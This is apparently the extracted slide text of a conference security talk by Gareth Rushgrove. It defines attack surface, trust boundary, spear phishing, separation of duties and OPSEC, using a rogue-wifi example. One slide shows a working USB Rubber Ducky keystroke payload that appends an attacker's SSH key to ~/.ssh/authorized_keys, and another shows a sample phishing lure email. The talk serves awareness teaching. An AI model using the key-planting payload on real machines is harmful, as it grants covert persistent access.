Gareth Rushgrove the attack surface of a software environment is the sum of the different points (the "attack vectors") where an unauthorized user (the "attacker") can try to enter data to or extract data from an environment. ATTACK SURFACE
Gareth Rushgrove a term in computer science and security used to describe a boundary where program data or execution changes its level of "trust". The term refers to any distinct boundary within which a system trusts all sub-systems (including data). TRUST BOUNDARY
Gareth Rushgrove More Internet Some Internet Marks iPhone FREE CONFERENCE WIFI Hacked Android CONFERENCE VENUE Private Software Circus Company next door Coffee shop downstairs Software Circus II Docker Corp Avengers Tower FON My Blackberry Nokia4ever ABANK
Gareth Rushgrove More Internet Some Internet Marks iPhone FREE CONFERENCE WIFI Hacked Android CONFERENCE VENUE Private Software Circus Company next door Coffee shop downstairs Software Circus II Docker Corp Avengers Tower FON My Blackberry Nokia4ever ABANK This is the official conference wifi right?
Gareth Rushgrove More Internet Some Internet Marks iPhone FREE CONFERENCE WIFI Hacked Android CONFERENCE VENUE Private Software Circus Company next door Coffee shop downstairs Software Circus II Docker Corp Avengers Tower FON My Blackberry Nokia4ever ABANK Or is it this one? Whatever, both work
(without introducing more risk) DELAY 1000 COMMAND SPACE DELAY 500 STRING Terminal DELAY 500 ENTER DELAY 800 STRING echo 'RSA_PUB_ID' >> ~/.ssh/authorized_keys ENTER DELAY 1000 STRING killall Terminal ENTER Add my public key https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Passwordless-SSH-access-%28ssh-keys%29
an e-mail spoofing fraud attempt that targets a specific organization or individual, seeking unauthorized access to confidential data. Gareth Rushgrove SPEAR PHISHING
Hi Great to see you at last week. I thought you’d be interested in the container testing tool I mentioned. http://nothingevilhere.com. Would love to know what you think. Hopefully see you at DockerCon next year too.
having more than one person required to complete a task. In business the separation by sharing of more than one individual in one single task is an internal control intended to prevent fraud and error. Gareth Rushgrove SEPARATION OF DUTIES
a control mechanism designed to achieve a high level of security for especially critical material or operations. Under this rule all access and actions requires the presence of two authorized people at all times. Gareth Rushgrove TWO-PERSON RULE
Gareth Rushgrove a process that identifies critical information to determine if friendly actions can be observed by enemy intelligence and determines if information obtained by adversaries could be interpreted to be useful to them. OPERATIONAL SECURITY (OPSEC)